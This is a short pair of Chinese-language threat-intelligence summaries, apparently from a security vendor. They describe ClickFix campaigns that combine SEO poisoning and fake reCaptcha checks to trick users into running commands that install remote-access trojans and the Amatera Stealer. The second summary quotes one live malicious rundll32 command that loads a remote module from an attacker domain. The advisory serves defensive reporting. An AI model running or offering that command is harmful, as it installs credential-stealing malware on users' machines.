从剪贴板到内存:ClickFix组合攻击的纵深剖析与地域化投递

概述

  近期,瑞星威胁情报平台发现一起利用SEO投毒 + ClickFix组合技术进行初始投递的定向攻击事件。攻击者通过操纵搜索引擎排名,将恶意站点推送至搜索结果前列,诱骗用户访问。随后利用ClickFix技术伪装人机验证,诱导用户在终端中粘贴并执行恶意命令,最终在受害者主机中植入远控木马和信息窃取器。

虚假验证背后的真实危机:伪装reCaptcha的“ClickFix”战术与背后Amatera Stealer窃密活动

概述

  瑞星威胁情报平台近期捕获到一起利用ClickFix战术实施的钓鱼攻击活动。攻击者通过伪造验证页面并仿冒合法机构主题内容,诱导受害者在本机执行恶意命令:rundll32.exe \\r2-gate-entry.terralibre.in.net@80\verification.google,#1,随后从远程加载恶意模块并投放Amatera Stealer窃密木马。